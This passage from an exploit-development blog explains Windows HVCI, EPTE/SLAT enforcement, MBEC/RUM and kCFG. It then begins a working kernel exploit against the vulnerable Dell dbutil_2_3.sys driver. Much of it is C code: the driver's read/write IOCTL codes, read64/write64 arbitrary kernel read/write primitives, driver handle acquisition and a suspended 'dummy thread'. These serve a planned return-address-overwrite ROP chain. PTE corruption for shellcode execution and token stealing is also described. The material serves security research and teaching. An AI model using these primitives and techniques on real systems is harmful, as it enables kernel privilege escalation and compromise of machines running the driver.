I won’t get into the internals of this function - but securekernel!HvcallCodeVa emits a vmcall assembly instruction - which is like a “Hyper-V syscall”, called a “hypercall”. This instruction will hand execution off to the hypervisor. Hypercalls can be made by both VTL 1 and VTL 0.

When a hypercall is made, the “hypercall call code” (similar to a syscall ID) is placed in the lower 16 bits of RCX. The remaining bits of RCX carry additional fields, as defined by the Hypervisor Top-Level Functional Specification (TLFS), and the full 64-bit value is known as the “hypercall input value”.
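As a sketch of that layout, assuming the TLFS field positions (call code in bits 15:0, fast flag in bit 16, variable header size in bits 26:17, rep count in bits 43:32, rep start index in bits 59:48), the helper below packs a hypercall input value. It illustrates the format only; it is not how securekernel.exe builds the value, and the function names are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

/* Call code for HvCallModifyVtlProtectionMask (TLFS Appendix A). */
#define HVCALL_MODIFY_VTL_PROTECTION_MASK 0x000Cu

/* Packs a hypercall input value (what ends up in RCX before vmcall). */
static uint64_t make_hypercall_input(uint16_t call_code, bool fast,
                                     uint16_t var_header_qwords,
                                     uint16_t rep_count,
                                     uint16_t rep_start_index)
{
    uint64_t v = 0;
    v |= (uint64_t)call_code;                            /* bits 15:0  */
    v |= (uint64_t)(fast ? 1u : 0u) << 16;               /* bit 16     */
    v |= (uint64_t)(var_header_qwords & 0x3FFu) << 17;   /* bits 26:17 */
    v |= (uint64_t)(rep_count & 0xFFFu) << 32;           /* bits 43:32 */
    v |= (uint64_t)(rep_start_index & 0xFFFu) << 48;     /* bits 59:48 */
    return v;
}

/* The call code always lives in the low 16 bits of the input value. */
static uint16_t hypercall_call_code(uint64_t input)
{
    return (uint16_t)(input & 0xFFFFu);
}
```

For example, a non-fast HvCallModifyVtlProtectionMask call covering three pages would use a rep count of 3 and a rep start index of 0.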

Each hypercall returns a “hypercall status code”, which is a 16-bit value (whereas NTSTATUS codes are 32-bit). For instance, a code of HV_STATUS_SUCCESS means that the hypercall completed successfully.

Specifically, in our case, the hypercall call code associated with securekernel!ShvlpProtectPages is 0xC.

If we cross reference this hypercall call code with Appendix A: Hypercall Code Reference of the TLFS, we can see that 0xC corresponds with HvCallModifyVtlProtectionMask, which makes sense based on the operation we are trying to perform. This hypercall will “configure” an immutable memory protection (SLAT protection) on the in-scope page (in our scenario, a page within one of the boot-loaded driver’s sections), in the context of VTL 0.

We can also infer, based on the above image, that this isn’t a fast call, but a rep (repeat) call. Rep hypercalls are broken up into a “series” of hypercalls because hypercalls are expected to complete within roughly 50 microseconds, before other components (interrupts, for instance) need to be serviced. An interrupted rep hypercall picks up where it left off when the thread executing the hypercall resumes.
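On return, the TLFS describes a 64-bit hypercall result value (in RAX) whose bits 15:0 hold the 16-bit HV_STATUS and whose bits 43:32 report how many reps completed. The decoder below is a minimal sketch assuming that layout; it shows how a caller could tell whether a rep call such as HvCallModifyVtlProtectionMask processed every element. The function names are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

#define HV_STATUS_SUCCESS 0x0000u

/* Bits 15:0 of the result value: the 16-bit hypercall status code. */
static uint16_t hv_result_status(uint64_t result)
{
    return (uint16_t)(result & 0xFFFFu);
}

/* Bits 43:32 of the result value: number of reps completed. */
static uint16_t hv_result_reps_complete(uint64_t result)
{
    return (uint16_t)((result >> 32) & 0xFFFu);
}

/* A rep hypercall fully succeeded if the status is success and every rep ran. */
static bool hv_rep_call_done(uint64_t result, uint16_t rep_count)
{
    return hv_result_status(result) == HV_STATUS_SUCCESS &&
           hv_result_reps_complete(result) == rep_count;
}
```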

To summarize this section - with HVCI there are two views of memory - one managed by the hypervisor, and one managed by the Windows kernel through PTEs. Not only does the hypervisor’s view of memory trump the Windows kernel view of memory - but the hypervisor’s view of memory is immutable from the “normal” Windows kernel. An attacker, even with a kernel-mode write primitive, cannot modify the permissions of a page through PTE manipulation anymore.

Let’s actually get into our exploitation to test these theories out.

HVCI - Exploitation Edition

As I have blogged about before, a common way kernel-mode exploits manifest themselves is the following (leveraging an arbitrary read/write primitive):

  1. Write a kernel-mode payload to kernel mode (could be KUSER_SHARED_DATA) or user mode.
  2. Locate the page table entry that corresponds to the page where the payload resides.
  3. Corrupt that page table entry to mark the page as KRWX (kernel, read, write, and execute).
  4. Overwrite a function pointer (nt!HalDispatchTable + 0x8 is a common method) with the address of your payload and trigger the function pointer to gain code execution.
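Steps 2 and 3 are plain arithmetic once the read/write primitive exists. The sketch below assumes the well-known nt!MiGetPteAddress computation and the standard x64 PTE bits (bit 1 R/W, bit 2 U/S, bit 63 NX). The PTE base has been randomized since Windows 10 1607, so in practice it must be leaked first; 0xFFFFF68000000000 is the old static base, used here only as an example. The helper names are hypothetical.

```c
#include <stdint.h>

#define PTE_RW (1ULL << 1)   /* bit 1: writable                */
#define PTE_US (1ULL << 2)   /* bit 2: user (1) or kernel (0)  */
#define PTE_NX (1ULL << 63)  /* bit 63: no-execute             */

/* Same arithmetic as nt!MiGetPteAddress; pte_base must be leaked first. */
static uint64_t get_pte_address(uint64_t va, uint64_t pte_base)
{
    return ((va >> 9) & 0x7FFFFFFFF8ULL) + pte_base;
}

/* Step 3: turn a PTE value into kernel, read, write, execute (KRWX). */
static uint64_t make_krwx(uint64_t pte)
{
    pte |= PTE_RW;    /* writable            */
    pte &= ~PTE_US;   /* supervisor (kernel) */
    pte &= ~PTE_NX;   /* executable          */
    return pte;
}
```

With the legacy base, KUSER_SHARED_DATA + 0x800 (0xFFFFF78000000800) resolves to the PTE at 0xFFFFF6FBC0000000. Without HVCI, writing make_krwx(old_pte) back with the write primitive is all step 3 needs.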

HVCI is able to combat this because a PTE is “no longer the source of truth” for what permissions a memory page actually has. Let’s look at this in detail.

As we know, KUSER_SHARED_DATA + 0x800 is a common code cave abused by adversaries (although this is not possible in future builds of Windows 11). Let’s see if we can abuse it with HVCI enabled.

Note that using Hyper-V it is possible to enable HVCI while also disabling Secure Boot. Secure Boot must be disabled for kernel debugging. After disabling Secure Boot we can then enable HVCI, which can be found in the Windows Security settings under Core Isolation -> Memory Integrity. Memory Integrity is HVCI.

Let’s then manually corrupt the PTE of 0xFFFFF78000000000 + 0x800 to make this page readable/writable/executable (RWX).

0xFFFFF78000000000 + 0x800 should now be fully readable, writable, and executable. This page is empty (doesn’t contain any code) so let’s write some NOP instructions to this page as a proof-of-concept. When 0xFFFFF78000000000 + 0x800 is executed, the NOP instructions should be dispatched.

We then can load this address into RIP to queue it for execution, which should execute our NOP instructions.

The outcome, however, is not what we intended. As we can see, executing the NOPs crashes the system, even though we explicitly marked the page as KRWX. Why is this? This is due to HVCI! Since HVCI doesn’t allow RAM to be RWX, the physical page backing KUSER_SHARED_DATA + 0x800 is “managed” by the EPTE (meaning the EPTE’s definition of the physical page is the “root of trust”). Since the EPTE is managed by the hypervisor, the page keeps its original read/write (non-executable) permissions, even though we marked the PTE (in VTL 0) as KRWX! Remember, EPTEs are “the root of trust” in this case, and they enforce their permissions on the page regardless of what the PTE says. We are trying to execute code which looks executable in the eyes of the OS (in VTL 0), because the PTE says so, but in fact the page is not executable. Therefore we get an access violation, because we are attempting to execute memory which isn’t actually executable! This is because the hypervisor’s “view” of memory, managed by the EPTEs, trumps the view our VTL 0 operating system has, which relies on “traditional” PTEs.

This is all fine and dandy, but what about exploits that allocate RWX user-mode code, write shellcode that will be executed in the kernel into the user-mode allocation, and then use a kernel read/write primitive, similarly to the first example in this blog post to corrupt the PTE of the user-mode page to mark it as a kernel-mode page? If this were allowed to happen - as we are only manipulating the U/S bit and not manipulating the executable bits (NX) - this would violate HVCI in a severe way - as we now have fully-executable code in the kernel that we can control the contents of.

Practically, an attacker would start by allocating some user-mode memory (via VirtualAlloc or similar APIs/C-runtime functions). The attacker marks this page as readable/writable/executable. The attacker would then write some shellcode into this allocation (usually kernel exploits use token-stealing shellcode, but other times an attacker may want to use something else). The key here to remember is that the memory is currently sitting in user mode.

This allocation is located at 0x1ad0000 in our example (U in the PTE stands for a user-mode page).

Using a kernel vulnerability, an attacker would arbitrarily read memory in kernel mode in order to resolve the PTE that corresponds to this user-mode shellcode located at 0x1ad0000. Using the kernel vulnerability, an attacker could corrupt the PTE bits to tell the memory manager that this page is now a kernel-mode page (represented by the letter K).

Lastly, using the vulnerability again, the attacker overwrites a function pointer in kernel mode that, when executed, will actually execute our user-mode code.

Now you may be thinking - “Connor, you just told me that the kernel doesn’t allow RWX memory with HVCI enabled? You just executed RWX memory in the kernel! Explain yourself!”.

Let’s first start off by understanding that all user-mode pages are represented as RWX within the EPTEs - even with HVCI enabled. After all, HVCI is there to prevent unsigned-code from being executed in the kernel. You may also be thinking - “Connor, doesn’t that violate the basic principle of DEP in user-mode?”. In this case, no it doesn’t. Recall that earlier in this blog post we said the following:

(we will talk more about how this affects traditional PTEs later and the level of enforcement on memory PTEs have when coupled with EPTEs).

Let’s talk about that now.

Remember that HVCI is used to ensure there is no kernel-mode RWX memory. So, even though the EPTE says a user-mode page is RWX, the PTE (for a user-mode page) will enforce DEP by marking data pages as non-executable. Recall that we said EPTEs can “trump” PTEs; we didn’t say they do this in 100 percent of cases. DEP is a case where the PTE is used instead of needing to “go” to the EPTE. If a given page is already marked as non-executable in the PTE, why would the EPTE need to be checked? The PTE itself would prevent execution of code in this page, so checking it again in the EPTE would be redundant. Instead, the EPTE is checked when a PTE is marked as executable, to ensure that the page is actually executable. The PTE is the first line of defense. If something “gets past the PTE” (e.g. a page is executable), the CPU will check the EPTE to ensure the page actually is executable. This is why the EPTEs mark all user-mode pages as RWX: the PTE itself already enforces DEP for the user-mode address space.

The EPTE structure doesn’t have a U/S bit and, therefore, relies on the current privilege level (CPL) of the processor executing code to determine whether code should be executed as kernel mode or user mode. The CPU, in this case, will rely on the standard page table entries to determine what the CPL of the code segment should be when code is executing - meaning an attacker can take advantage of the fact that user-mode pages are marked as RWX, by default, in the EPTEs, and then flip the U/S bit to a supervisor (kernel) page. The CPU will then execute the code as kernel mode.

This means that the only thing enforcing the kernel/user boundary (for code execution purposes) is the CPU (via SMEP). SMEP, as we know, essentially doesn’t allow user-mode code execution from the kernel. So, to get around this, we can use PTE corruption (as shown in my previously-linked blog on PTE overwrites) to mark a user-mode page as a kernel-mode one. When the kernel now goes to execute our shellcode, it will “recognize” the shellcode page (technically in the user-mode address space) as a kernel-mode page. EPTEs don’t have a “bit” to define whether a given page is kernel or user, so they rely on the already existing SMEP technology to enforce this, which uses “normal” PTEs to determine if a given page is a kernel-mode or user-mode page. Since the EPTEs only look at the executable permissions, and not a U/S bit, the “old” primitive of “tricking” the CPU into executing a “fake” kernel-mode page still exists, as EPTEs still rely on the CPU to enforce this boundary. So when a given user-mode page is being executed, the EPTEs assume this is a user-mode page and will gladly execute it. The CPU, however, has its code segment executing in ring 0 (kernel mode) because the PTE of the page was corrupted to mark it as a “kernel-mode” page (a la the “U/S SMEP bypass”).
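The reasoning above can be captured as a toy decision function for a single instruction fetch, before MBEC/RUM enter the picture. This is a simplified model of the layered checks described in this section (PTE NX first, then SMEP on the PTE’s U/S bit, then the EPTE’s execute bit), not the processor’s actual algorithm; the struct and function names are hypothetical.

```c
#include <stdbool.h>

/* Toy inputs for one instruction fetch (pre-MBEC). */
struct fetch {
    int  cpl;       /* 0 = kernel, 3 = user                       */
    bool pte_user;  /* PTE U/S bit: true = user-mode page         */
    bool pte_nx;    /* PTE NX bit                                 */
    bool epte_x;    /* EPTE execute bit (the EPTE has no U/S bit) */
};

static bool fetch_allowed(const struct fetch *f, bool smep)
{
    if (f->pte_nx)                            /* PTE: first line of defense   */
        return false;
    if (smep && f->cpl == 0 && f->pte_user)   /* SMEP: no user pages at CPL 0 */
        return false;
    return f->epte_x;                         /* EPTE: only "executable or not" */
}
```

An honest user page is blocked at CPL 0 by SMEP, but once its U/S bit is flipped to supervisor, nothing in this model stops the fetch, because the EPTE for a user page allows execution.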

To compensate for this, Intel has a hardware solution known as Mode-Based Execution Control, or MBEC. For CPUs that cannot support MBEC Microsoft has its own emulation of MBEC called Restricted User Mode, or RUM.

I won’t get into the nitty-gritty details of the nuanced differences between RUM and MBEC, but these are solutions which mitigate the exact scenario I just mentioned. Essentially, anytime execution is in the kernel on Windows, all of the user-mode pages are treated as non-executable. Here is how this would look (please note that the EPTE “bits” are just “pseudo” EPTE bits, and are not indicative of what the EPTE bits actually look like).

First, the token-stealing payload is allocated in user-mode as RWX. The PTE is then corrupted to mark the shellcode page as a kernel-mode page.

Then, as we know, the function pointer is overwritten and execution returns to user-mode (but the code is executed in context of the kernel).

Notice what happens above. At the EPTE level (this doesn’t occur at the PTE level) the page containing the shellcode is marked as non-executable. Although the diagram shows us clearing the execute bit, the way the user-mode pages are marked as non-executable is actually done by adding an extra bit in the EPTE structure that allows the EPTE for the user-mode page to be marked as non-executable while execution is residing in the kernel (e.g. the code segment is “in ring 0”). This bit is a member of the EPTE structure that we can refer to as “ExecuteForUserMode”.

This is an efficient way to mark user-mode code pages as non-executable. When kernel-mode code execution occurs, all of the EPTEs for the user-mode pages are simply just marked as non-executable.

MBEC is really great - but what about computers which support HVCI but don’t support MBEC (which is a hardware technology)? For these cases Microsoft implemented RUM (Restricted User Mode). RUM achieves the same thing as MBEC, but in a different way. RUM essentially forces the hypervisor to keep a second set of EPTEs - with this “new” set having all user-mode pages marked as non-executable. So, essentially using the same method as loading a new PML4 address into CR3 for “normal” paging - the hypervisor can load the “second” set of extended page tables (with this “new/second” set marking all user-mode as non-executable) into use. This means each time execution transitions from kernel-mode to user-mode, the paging structures are swapped out - which increases the overhead of the system. This is why MBEC is less strenuous - as it can just mark a bit in the EPTEs. However, when MBEC is not supported - the EPTEs don’t have this ExecuteForUserMode bit - and rely on the second set of EPTEs.
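Both mitigations give the same answer through different mechanisms, which a toy model can contrast. Following the pseudo-EPTE diagrams above (not Intel’s real EPT format), MBEC is modeled as one EPTE with an extra per-page bit checked against the current mode, and RUM as two whole EPT “sets” that are swapped on mode transitions. All names are hypothetical.

```c
#include <stdbool.h>

/* Pseudo-EPTE, mirroring the diagrams' "pseudo" bits. */
struct pseudo_epte {
    bool execute;    /* page is executable at all                    */
    bool user_page;  /* stands in for the "ExecuteForUserMode" idea  */
};

/* MBEC-style: one EPT; the extra bit is consulted per execution mode. */
static bool mbec_can_execute(const struct pseudo_epte *e, bool in_kernel)
{
    return e->execute && !(in_kernel && e->user_page);
}

/* RUM-style: two EPT sets; the set active in kernel mode marks user pages NX. */
static bool rum_can_execute(const struct pseudo_epte *user_set_entry,
                            const struct pseudo_epte *kernel_set_entry,
                            bool in_kernel)
{
    const struct pseudo_epte *active = in_kernel ? kernel_set_entry : user_set_entry;
    return active->execute;
}
```

The RUM version has to pick a different table on every transition, which is the extra overhead described above; the MBEC version only evaluates one more bit.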

At this point we have spent a lot of time talking about HVCI, MBEC, and RUM. We can come to the following conclusions now:

  1. PTE manipulation to achieve unsigned-code execution is impossible
  2. Any unsigned-code execution in the kernel is impossible

Knowing this, a different approach is needed. Let’s now talk about how we can use an arbitrary read/write primitive to our advantage to get around HVCI and MBEC/RUM, without being limited to only hot-swapping tokens for privilege escalation.

From Read/Write To Arbitrary Kernel-Mode Function Invocation

I did a writeup of a recent Dell BIOS driver vulnerability a while ago, where I achieved unsigned-code execution in the kernel via PTE manipulation. Afterwards I tweeted that readers should take into account that this exploit doesn’t consider VBS/HVCI. I eventually received a response from @d_olex on using a different method to take advantage of a kernel-mode vulnerability with HVCI enabled: essentially putting together your own kernel-mode API calls.

This was about a year ago - and I have been “chewing” on this idea for a while. Dmytro later released a library outlining this concept.

This technique is the basis for how we will “get around” VBS/HVCI in this blog. We can essentially instrument a kernel-mode ROP chain that will allow us to call into any kernel-mode API we wish (while redirecting execution in a way that doesn’t trigger Kernel Control Flow Guard, or kCFG).

Why might we want to do this, given that HVCI prevents us from executing shellcode? The beauty of executing unsigned code is that we aren’t limited to something like token stealing. Shellcode also provides us a way to execute arbitrary Windows API functions, or further corrupt memory. Think about something like a Cobalt Strike Beacon agent - it leverages Windows API functions for network communications, etc. - and this is foundational to most malware.

Although with HVCI we can’t invoke our own shellcode in the kernel - it is still possible to “emulate” what kernel-mode shellcode may intend to do, which is calling arbitrary functions in kernel mode. Here is how we can achieve this:

  1. In our exploit, we can create a “dummy” thread in a suspended state via CreateThread.
  2. Assuming our exploit is running from a “normal” process (running in medium integrity), we can use NtQuerySystemInformation to leak the KTHREAD object associated with the suspended thread. From here we can leak KTHREAD.StackBase, which gives us the address of the kernel-mode stack so that we can write to it (each thread has its own stack, and stack control is a must for a ROP chain).
  3. We can locate a return address on the stack and corrupt it with our first ROP gadget, using our kernel arbitrary write vulnerability (this gets around kCFG, or Control Flow Guard in the kernel, since kCFG doesn’t inspect backwards edge control-flow transfers like ret. However, in the future when kCET (Control-Flow Enforcement Technology in the Windows kernel) is mainstream on Windows systems, ROP will not work - and this exploit technique will be obsolete).
  4. We then can use our ROP chain in order to call an arbitrary kernel-mode API. After we have called our intended kernel mode API(s), we then end our ROP chain with a call to the kernel-mode function nt!ZwTerminateThread - which allows us to “gracefully” exit our “dummy” thread without needing to use ROP to restore the execution we hijacked.
  5. We then call ResumeThread on the suspended thread in order to kick off execution.
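In the end, the chain from steps 3 and 4 is just an array of QWORDs that write64() would place over the hijacked return address, one QWORD at a time. The sketch below lays one out for a single two-argument call followed by ZwTerminateThread(NtCurrentThread(), 0). Every address is a hypothetical placeholder to be resolved at runtime (kernel base leak plus gadget offsets), and the gadgets themselves (pop rcx ; ret, pop rdx ; ret, add rsp, 0x20 ; ret) are assumptions about what can be found in ntoskrnl.exe. It reserves the 0x20 bytes of x64 shadow space after the target call, but it does not handle 16-byte stack alignment, which a real chain must also satisfy.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical, runtime-resolved kernel addresses (none of these are real). */
struct rop_addrs {
    uint64_t pop_rcx_ret;          /* pop rcx ; ret                          */
    uint64_t pop_rdx_ret;          /* pop rdx ; ret                          */
    uint64_t add_rsp_20_ret;       /* add rsp, 0x20 ; ret (skip shadow space) */
    uint64_t target_api;           /* kernel API we want to call             */
    uint64_t zw_terminate_thread;  /* nt!ZwTerminateThread                   */
};

/*
 * Fills `chain` (at least 15 slots) and returns the number of QWORDs used.
 * chain[0] is what overwrites the saved return address on the dummy
 * thread's kernel stack.
 */
static size_t build_chain(uint64_t *chain, const struct rop_addrs *a,
                          uint64_t arg1, uint64_t arg2)
{
    size_t i = 0;

    /* target_api(arg1, arg2): x64 passes the first two args in RCX and RDX */
    chain[i++] = a->pop_rcx_ret;
    chain[i++] = arg1;
    chain[i++] = a->pop_rdx_ret;
    chain[i++] = arg2;
    chain[i++] = a->target_api;
    chain[i++] = a->add_rsp_20_ret;   /* target_api returns here */
    for (int k = 0; k < 4; k++)
        chain[i++] = 0;               /* 0x20 bytes of shadow space */

    /* ZwTerminateThread(NtCurrentThread(), 0): exit without repairing the stack */
    chain[i++] = a->pop_rcx_ret;
    chain[i++] = (uint64_t)-2;        /* NtCurrentThread() pseudo-handle */
    chain[i++] = a->pop_rdx_ret;
    chain[i++] = 0;                   /* ExitStatus */
    chain[i++] = a->zw_terminate_thread;

    return i;
}
```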

Again, I just want to note: this is not an “HVCI bypass” post. HVCI does not suffer from any vulnerability that this blog post intends to exploit. Instead, this blog shows an alternative method of exploitation that allows us to call any kernel-mode API without triggering HVCI.

Before continuing on, let’s briefly touch on why we are opting to overwrite a return address on the stack instead of a function pointer, as many of my previous blogs have done. As we saw with my previous browser exploitation blog series, CFG is a mitigation that is pretty mainstream on Windows systems, and it came to the kernel with Windows 10 RS2. kCFG is present on most systems today - and it is an interesting topic. The CFG bitmap consists of all “valid” functions used in control-flow transfers. The CFG dispatch functions check this bitmap when an indirect function call happens, to ensure that a function pointer has not been overwritten with a malicious function. The CFG bitmap (in user mode) is protected by DEP, meaning the bitmap is read-only, so an attacker cannot modify it (the bitmap is stored in ntdll!LdrSystemDllInitBlock+0x8). We can use our kernel debugger to switch our current process to a user-mode process which loads ntdll.dll and verify this via the PTE.

This means an attacker would have to first bypass CFG (in context of a binary exploit which hijacks control-flow) in order to call an API like VirtualProtect to mark this page as writable. Since the permissions are enforced by DEP - the kernel is the security boundary which protects the CFG bitmap, as the PTE (stored in kernel mode) describes the bitmap as read-only. However, when talking about kCFG (in the kernel) there would be nothing that protects the bitmap - since historically the kernel was the highest security boundary. If an adversary has an arbitrary kernel read/write primitive - an adversary could just modify the kCFG bitmap to make everything a valid call target, since the bitmap is stored in kernel mode. This isn’t good, and means we need an “immutable” boundary to protect this bitmap. Recall, however, that with HVCI there is a higher security boundary - the hypervisor!

kCFG is only fully enabled when HVCI is enabled. SLAT is used to protect the kCFG bitmap. As we can see below, when we attempt to overwrite the bitmap, we get an access violation. This is due to the fact that although the PTE for the kCFG bitmap says it is writable, the EPTE can enforce that this page is not writable - and therefore, with kCFG, non-modifiable by an adversary.

So, since we cannot just modify the bitmap to allow us to call anywhere in the address space, and since kCFG will protect function pointers (like nt!HalDispatchTable + 0x8) and not return addresses (as we saw in the browser exploitation series) - we can simply overwrite a return address to hijack control flow. As mentioned previously, kCET will mitigate this - but looking at my current Windows 11 VM (which has a CPU that can support kCET), kCET is not enabled. This can be checked via nt!KeIsKernelCetEnabled and nt!KeIsKernelCetAuditModeEnabled (both return a boolean - which is false currently).

Now that we have talked about control-flow hijacking, let’s see how this looks practically! For this blog post we will be using the previous Dell BIOS driver exploit I talked about to demonstrate this. To understand how the arbitrary read/write primitive works, I highly recommend you read that blog first. To summarize briefly, there are IOCTLs within the driver that allow us to read one kernel-mode QWORD at a time and to write one QWORD at a time, from user mode, into kernel mode.

“Dummy Thread” Creation to KTHREAD Leak

First, our exploit begins by defining some IOCTL codes and some NTSTATUS codes.

//
// Vulnerable IOCTL codes
//
#define IOCTL_WRITE_CODE 0x9B0C1EC8
#define IOCTL_READ_CODE 0x9B0C1EC4

//
// NTSTATUS codes
//
#define STATUS_INFO_LENGTH_MISMATCH 0xC0000004
#define STATUS_SUCCESS 0x00000000
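The two IOCTL codes can be decoded with the standard CTL_CODE layout (device type in bits 31:16, required access in bits 15:14, function number in bits 13:2, transfer method in bits 1:0). The helper names below are hypothetical; decoding shows both codes use METHOD_BUFFERED (0) and FILE_ANY_ACCESS (0), differing only in function number (0x7B1 for read, 0x7B2 for write).

```c
#include <stdint.h>

/* Field extraction for the standard CTL_CODE layout. */
static uint32_t ioctl_device_type(uint32_t code) { return code >> 16; }
static uint32_t ioctl_access(uint32_t code)      { return (code >> 14) & 0x3u; }
static uint32_t ioctl_function(uint32_t code)    { return (code >> 2) & 0xFFFu; }
static uint32_t ioctl_method(uint32_t code)      { return code & 0x3u; }
```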

Let’s also outline our read64() and write64() functions. These functions give us an arbitrary read/write primitive (I won’t expand on these; see the blog post related to the vulnerability for more information).

read64():

ULONG64 read64(HANDLE inHandle, ULONG64 WHAT)
{
	//
	// Buffer to send to the driver (read primitive)
	//
	ULONG64 inBuf[4] = { 0 };

	//
	// Values to send
	//
	ULONG64 one = 0x4141414141414141;
	ULONG64 two = WHAT;
	ULONG64 three = 0x0000000000000000;
	ULONG64 four = 0x0000000000000000;

	//
	// Assign the values
	//
	inBuf[0] = one;
	inBuf[1] = two;
	inBuf[2] = three;
	inBuf[3] = four;

	//
	// Interact with the driver
	//
	DWORD bytesReturned = 0;

	BOOL interact = DeviceIoControl(
		inHandle,
		IOCTL_READ_CODE,
		&inBuf,
		sizeof(inBuf),
		&inBuf,
		sizeof(inBuf),
		&bytesReturned,
		NULL
	);

	//
	// Error handling
	//
	if (!interact)
	{
		//
		// Bail out
		//
		goto exit;

	}
	else
	{
		//
		// Return the QWORD
		//
		return inBuf[3];
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Close the handle before exiting
	//
	CloseHandle(
		inHandle
	);

	//
	// Return an error
	//
	return (ULONG64)1;
}

write64():

BOOL write64(HANDLE inHandle, ULONG64 WHERE, ULONG64 WHAT)
{
	//
	// Buffer to send to the driver (write primitive)
	//
	ULONG64 inBuf1[4] = { 0 };

	//
	// Values to send
	//
	ULONG64 one1 = 0x4141414141414141;
	ULONG64 two1 = WHERE;
	ULONG64 three1 = 0x0000000000000000;
	ULONG64 four1 = WHAT;

	//
	// Assign the values
	//
	inBuf1[0] = one1;
	inBuf1[1] = two1;
	inBuf1[2] = three1;
	inBuf1[3] = four1;

	//
	// Interact with the driver
	//
	DWORD bytesReturned1 = 0;

	BOOL interact = DeviceIoControl(
		inHandle,
		IOCTL_WRITE_CODE,
		&inBuf1,
		sizeof(inBuf1),
		&inBuf1,
		sizeof(inBuf1),
		&bytesReturned1,
		NULL
	);

	//
	// Error handling
	//
	if (!interact)
	{
		//
		// Bail out
		//
		goto exit;

	}
	else
	{
		//
		// Return TRUE
		//
		return TRUE;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Close the handle before exiting
	//
	CloseHandle(
		inHandle
	);

	//
	// Return FALSE (arbitrary write failed)
	//
	return FALSE;
}

Now that we have our primitives established, we start off by obtaining a handle to the driver in order to communicate with it. We will need to supply this value for our read/write primitives.

HANDLE getHandle(void)
{
	//
	// Obtain a handle to the driver
	//
	HANDLE driverHandle = CreateFileA(
		"\\\\.\\DBUtil_2_3",
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		0x0,
		NULL
	);

	//
	// Error handling
	//
	if (driverHandle == INVALID_HANDLE_VALUE)
	{
		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// Return the driver handle
		//
		return driverHandle;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an invalid handle
	//
	return (HANDLE)-1;
}

We can invoke this function in main().

/**
 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
 */
int main(void)
{
	//
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	//
	HANDLE driverHandle = getHandle();

	//
	// Error handling
	//
	if (driverHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

	//
	// Return success
	//
	return 0;

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return 1;
}

After obtaining the handle, we can then set up our “dummy thread” by creating a thread in a suspended state. This is the thread we will perform our exploit work in. This can be achieved via CreateThread (again, the key here is to create this thread in a suspended state; more on this later).

/**
 * @brief Function used to create a "dummy thread"
 *
 * This function creates a "dummy thread" that is suspended.
 * This allows us to leak the kernel-mode stack of this thread.
 *
 * @param Void.
 * @return A handle to the "dummy thread"
 */
HANDLE createdummyThread(void)
{
	//
	// Invoke CreateThread
	//
	HANDLE dummyThread = CreateThread(
		NULL,
		0,
		(LPTHREAD_START_ROUTINE)randomFunction,
		NULL,
		CREATE_SUSPENDED,
		NULL
	);

	//
	// Error handling (CreateThread returns NULL, not INVALID_HANDLE_VALUE, on failure)
	//
	if (dummyThread == NULL)
	{
		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// Return the handle to the thread
		//
		return dummyThread;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an invalid handle
	//
	return (HANDLE)-1;
}

You’ll see that our createdummyThread function returns a handle to the “dummy thread”. Notice that the LPTHREAD_START_ROUTINE for the thread goes to randomFunction, which we also can define. This thread will never actually execute this function via its entry point, so we will just supply a simple function which does “nothing”.
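The text leaves the body of randomFunction up to us. Below is a minimal sketch of such a “do nothing” routine. The name comes from the code above, while the body and the non-Windows type stand-ins are assumptions added so the snippet also compiles outside of Windows. On Windows, what matters is the DWORD WINAPI (LPVOID) shape, which matches LPTHREAD_START_ROUTINE.

```c
#include <stdint.h>

#ifdef _WIN32
#include <windows.h>
#else
/* Assumed stand-ins so the sketch compiles off Windows */
typedef uint32_t DWORD;
typedef void *LPVOID;
#define WINAPI
#endif

/*
 * Hypothetical "do nothing" thread routine with the LPTHREAD_START_ROUTINE
 * shape. The suspended "dummy thread" never reaches it via its entry point.
 */
DWORD WINAPI randomFunction(LPVOID lpParam)
{
    (void)lpParam; /* unused */
    return 0;
}
```

With a matching signature, the (LPTHREAD_START_ROUTINE) cast in createdummyThread() becomes unnecessary, although it is harmless.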

We then can call createdummyThread within main() to execute the call. This will create our “dummy thread”.

/**
 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
 */
int main(void)
{
	//
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	//
	HANDLE driverHandle = getHandle();

	//
	// Error handling
	//
	if (driverHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

	//
	// Invoke createdummyThread() to create our "dummy thread"
	//
	HANDLE getthreadHandle = createdummyThread();

	//
	// Error handling
	//
	if (getthreadHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't create the \"dummy thread\". Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Created the \"dummy thread\"!\n");

	//
	// Return success
	//
	return 0;

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return 1;
}

Now we have a handle to the driver and a thread that is in a suspended state.

